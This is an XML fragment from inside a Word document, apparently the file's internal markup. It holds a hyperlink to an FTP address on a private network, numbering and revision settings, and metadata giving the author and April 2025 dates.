        <w:r w:rsidR="004C29F8" w:rsidRPr="0028733E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ftp://192.168.146.129</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7315DEFA" w14:textId="77777777" w:rsidR="004C29F8" w:rsidRDefault="004C29F8" w:rsidP="00216EAA"/>
    <w:p w14:paraId="2815B1EC" w14:textId="77777777" w:rsidR="004C29F8" w:rsidRDefault="004C29F8" w:rsidP="00216EAA"/>
    <w:p w14:paraId="37B6E6EF" w14:textId="77777777" w:rsidR="00C51745" w:rsidRDefault="00C51745" w:rsidP="00216EAA"/>
    <w:p w14:paraId="12B8631E" w14:textId="77777777" w:rsidR="00C51745" w:rsidRDefault="00C51745" w:rsidP="00216EAA"/>
    <w:sectPr w:rsidR="00C517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182B70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="474EF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7E3724"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D261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6B1DDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CFF44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2253570">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="291248413">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="16370274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EAA"/>
    <w:rsid w:val="00042679"/>
    <w:rsid w:val="000F38D1"/>
    <w:rsid w:val="00216EAA"/>
    <w:rsid w:val="002D3562"/>
    <w:rsid w:val="002E6BB4"/>
    <w:rsid w:val="003A314A"/>
    <w:rsid w:val="003B0A50"/>
    <w:rsid w:val="004C29F8"/>
    <w:rsid w:val="005A5BC6"/>
    <w:rsid w:val="005E4BCC"/>
    <w:rsid w:val="006346F3"/>
    <w:rsid w:val="007E52B2"/>
    <w:rsid w:val="00822660"/>
    <w:rsid w:val="009B2466"/>
    <w:rsid w:val="00A630B5"/>
    <w:rsid w:val="00AD4860"/>
    <w:rsid w:val="00B506C9"/>
    <w:rsid w:val="00C51745"/>
    <w:rsid w:val="00D53634"/>
    <w:rsid w:val="00E75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36260"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5786E0BA-D8A7-4A13-ABC3-3362A107F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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6E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6EA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C29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29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95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4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66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9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38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6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4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97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66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491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tp://192.168.146.12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1030</TotalTime>
  <Pages>4</Pages>
  <Words>566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Divyesh Tharakan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Divyesh Tharakan</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2025-04-10T18:58:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-10T11:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-11T05:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>